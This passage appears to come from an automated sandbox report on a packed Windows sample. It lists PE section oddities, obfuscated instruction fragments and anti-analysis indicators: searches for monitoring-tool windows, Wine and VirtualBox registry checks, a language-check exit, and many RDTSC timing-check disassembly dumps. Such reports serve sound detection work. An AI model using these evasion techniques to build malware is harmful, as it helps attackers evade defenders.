Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002D6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1bb4db should be: 0x1b0156
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: hnbmjddz
Source: file.exe | Static PE information: section name: fhrijgtr
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0068B040 push 1D41AA1Eh; mov dword ptr [esp], eax | 0_2_0068B29E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006C885F push 6EE7CB76h; mov dword ptr [esp], edx | 0_2_006C88A9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00713046 push 3D525341h; mov dword ptr [esp], ebx | 0_2_0071308E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070B84B push 4E4005DEh; mov dword ptr [esp], eax | 0_2_0070B895
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D281D push ecx; mov dword ptr [esp], ebp | 0_2_005D282E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D281D push eax; mov dword ptr [esp], 362921ADh | 0_2_005D288A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D281D push ebx; mov dword ptr [esp], esi | 0_2_005D28A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D281D push 6F52A6B8h; mov dword ptr [esp], esi | 0_2_005D28F7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D281D push 2C64FB2Fh; mov dword ptr [esp], eax | 0_2_005D293C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D281D push 5F991B51h; mov dword ptr [esp], edi | 0_2_005D2981
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00763839 push edi; mov dword ptr [esp], 02CDA24Dh | 0_2_00763B8A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E383C push 21DBAFA9h; mov dword ptr [esp], eax | 0_2_006E385B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006A5036 push 0E2307F9h; mov dword ptr [esp], ebx | 0_2_006A507F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00746828 push 1CC0F124h; mov dword ptr [esp], eax | 0_2_0074685F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0065801E push ebx; mov dword ptr [esp], 771B9D1Bh | 0_2_0065807D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0073E0E1 push 2168C594h; mov dword ptr [esp], eax | 0_2_0073E12F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002D7895 push ecx; ret | 0_2_002D78A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006D78AD push 7A670F43h; mov dword ptr [esp], ebp | 0_2_006D78E1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006D78AD push ecx; mov dword ptr [esp], edi | 0_2_006D78FD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007200B4 push esi; mov dword ptr [esp], ecx | 0_2_007200C8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0078796E push eax; mov dword ptr [esp], 6E297539h | 0_2_0078799C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00691973 push ebp; mov dword ptr [esp], eax | 0_2_006919FD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006CE155 push 36B9AAAAh; mov dword ptr [esp], edx | 0_2_006CE1BA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0055510D push esi; mov dword ptr [esp], ebp | 0_2_005551BB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0055510D push 351B2574h; mov dword ptr [esp], eax | 0_2_0055522C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0055510D push edx; mov dword ptr [esp], ebx | 0_2_0055524F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0055510D push eax; mov dword ptr [esp], ecx | 0_2_005552FB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0055510D push ebx; mov dword ptr [esp], ecx | 0_2_00555331
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0066E13A push 5A3DF4EEh; mov dword ptr [esp], edi | 0_2_0066E14C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0066E13A push 5D094971h; mov dword ptr [esp], ebp0_2_0066E1A4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0066E13A push ebp; mov dword ptr [esp], 7E6D333Ch0_2_0066E1BF
              Source: file.exeStatic PE information: section name: hnbmjddz entropy: 7.954657445334715

              Boot Survival

              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClass
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002D6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_002D6390

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-26007
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\Wine
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676413 second address: 676465 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007FF8A909BC16h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 js 00007FF8A909BC2Ah 0x00000016 jmp 00007FF8A909BC1Eh 0x0000001b jne 00007FF8A909BC16h 0x00000021 jmp 00007FF8A909BC1Bh 0x00000026 popad 0x00000027 jc 00007FF8A909BC36h 0x0000002d jmp 00007FF8A909BC1Eh 0x00000032 push eax 0x00000033 push edx 0x00000034 jc 00007FF8A909BC16h 0x0000003a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6765D0 second address: 6765D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6765D6 second address: 6765DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676B63 second address: 676B68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676B68 second address: 676B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676B6E second address: 676B74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676B74 second address: 676B7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6788CE second address: 6788EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A95A6CC6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6789AD second address: 6789DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF8A909BC24h 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 jl 00007FF8A909BC24h 0x00000017 push eax 0x00000018 push edx 0x00000019 jbe 00007FF8A909BC16h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6789DB second address: 678A08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push ebx 0x0000000b push ebx 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop ebx 0x0000000f pop ebx 0x00000010 mov eax, dword ptr [eax] 0x00000012 pushad 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 popad 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e popad 0x0000001f popad 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 pushad 0x00000025 jo 00007FF8A95A6CBCh 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 678A08 second address: 678A93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8A909BC1Bh 0x00000009 popad 0x0000000a pop eax 0x0000000b mov edx, ecx 0x0000000d push 00000003h 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007FF8A909BC18h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 mov edx, dword ptr [ebp+122D398Eh] 0x0000002f push 00000000h 0x00000031 mov edi, esi 0x00000033 push 00000003h 0x00000035 push 00000000h 0x00000037 push ebp 0x00000038 call 00007FF8A909BC18h 0x0000003d pop ebp 0x0000003e mov dword ptr [esp+04h], ebp 0x00000042 add dword ptr [esp+04h], 0000001Ch 0x0000004a inc ebp 0x0000004b push ebp 0x0000004c ret 0x0000004d pop ebp 0x0000004e ret 0x0000004f jmp 00007FF8A909BC1Bh 0x00000054 or si, CB73h 0x00000059 push CBC624F8h 0x0000005e push eax 0x0000005f push edx 0x00000060 ja 00007FF8A909BC1Ch 0x00000066 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 678A93 second address: 678A98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 678A98 second address: 678AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FF8A909BC16h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xor dword ptr [esp], 0BC624F8h 0x00000014 lea ebx, dword ptr [ebp+1244C6ACh] 0x0000001a mov dword ptr [ebp+122D35F6h], esi 0x00000020 push eax 0x00000021 pushad 0x00000022 jmp 00007FF8A909BC1Ah 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 678B8B second address: 678B90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 678B90 second address: 678B96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 678C5E second address: 678C64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69976D second address: 699771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 663C5B second address: 663CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8A95A6CC7h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FF8A95A6CC2h 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push esi 0x00000018 pop esi 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b popad 0x0000001c jbe 00007FF8A95A6CC2h 0x00000022 je 00007FF8A95A6CB6h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 663CA4 second address: 663CA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 663CA8 second address: 663CAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69799E second address: 6979A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6979A2 second address: 6979AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 697C22 second address: 697C26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 697F1D second address: 697F40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007FF8A95A6CBBh 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007FF8A95A6CBFh 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 698095 second address: 69809F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 698375 second address: 698379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 698379 second address: 6983CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A909BC26h 0x00000007 jmp 00007FF8A909BC1Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007FF8A909BC1Ch 0x00000013 pushad 0x00000014 push esi 0x00000015 pop esi 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 jmp 00007FF8A909BC24h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 jnc 00007FF8A909BC16h 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6983CB second address: 6983CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68CEEE second address: 68CEF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68CEF4 second address: 68CEFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68CEFB second address: 68CF05 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF8A909BC1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 698981 second address: 698985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 698985 second address: 698999 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FF8A909BC1Ch 0x0000000c pop ebx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 698999 second address: 6989B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A95A6CC6h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 699633 second address: 699639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 699639 second address: 69963F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69E9E3 second address: 69EA00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FF8A909BC16h 0x0000000a jo 00007FF8A909BC16h 0x00000010 popad 0x00000011 jmp 00007FF8A909BC1Ch 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69EA00 second address: 69EA18 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF8A95A6CC2h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69EA18 second address: 69EA1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A106D second address: 6A1075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A12CA second address: 6A12CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 665815 second address: 665819 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 665819 second address: 665836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF8A909BC27h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A4DAE second address: 6A4DB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A4DB4 second address: 6A4DCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A909BC24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A4DCC second address: 6A4DD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A4DD2 second address: 6A4DDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF8A909BC16h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A4DDC second address: 6A4DEB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF8A95A6CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A50B4 second address: 6A50B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A50B9 second address: 6A50D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jbe 00007FF8A95A6CB6h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jns 00007FF8A95A6CB8h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A520B second address: 6A5211 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A5211 second address: 6A521C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A521C second address: 6A5220 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A54FA second address: 6A5514 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF8A95A6CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FF8A95A6CBCh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A57F1 second address: 6A57FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FF8A909BC16h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A57FD second address: 6A5801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A5801 second address: 6A580B instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF8A909BC16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7821 second address: 6A7827 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7827 second address: 6A783E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF8A909BC1Ch 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A783E second address: 6A7844 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7ADC second address: 6A7AE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7DEE second address: 6A7DFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007FF8A95A6CB8h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A8678 second address: 6A867C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A867C second address: 6A8688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A8C20 second address: 6A8C26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A8C26 second address: 6A8C2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A8C2B second address: 6A8C35 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF8A909BC1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A8CE3 second address: 6A8CED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FF8A95A6CB6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AA2B1 second address: 6AA2C9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF8A909BC1Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007FF8A909BC16h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671237 second address: 671243 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671243 second address: 671247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671247 second address: 67124D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB2C6 second address: 6AB2CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB2CA second address: 6AB2D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB2D0 second address: 6AB2D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
